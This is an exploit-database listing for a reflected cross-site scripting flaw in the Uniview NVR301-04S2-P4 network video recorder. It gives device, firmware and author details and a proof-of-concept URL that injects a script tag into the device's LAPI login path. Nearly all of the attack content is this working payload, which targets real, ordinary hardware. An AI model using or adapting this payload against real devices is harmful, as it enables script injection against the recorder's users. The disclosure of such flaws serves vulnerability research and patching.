[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Uniview NVR301-04S2-P4 - Reflected Cross-Site Scripting Vulnerability

Author
Bleron Rrustemi
Risk
[
Security Risk Low
]
0day-ID
0day-ID-38374
Category
web applications
Date add
29-03-2023
Platform
hardware
# Exploit Title: Uniview NVR301-04S2-P4 - Reflected Cross-Site Scripting (XSS)
# Author: Bleron Rrustemi
# Discovery Date: 2022-11-15
# Vendor Homepage: https://www.uniview.com/tr/Products/NVR/Easy/NVR301-04S2-P4/
# Datasheet:: https://www.uniview.com/download.do?id=1761643
# Device Firmware: NVR-B3801.20.15.200829
# Tested Version: NVR301-04S2-P4
# Tested on: Windows 10 Enterprise LTSC 64\Firefox 106.0.5 (64-bit)
# Vulnerability Type: Reflected Cross-Site Scripting (XSS)
# CVE: N/A

# Proof of Concept:

IP=IP of the device

http://IP/LAPI/V1.0/System/Security/Login/"><script>alert('1')</script>



#  0day.today [2024-11-15]  #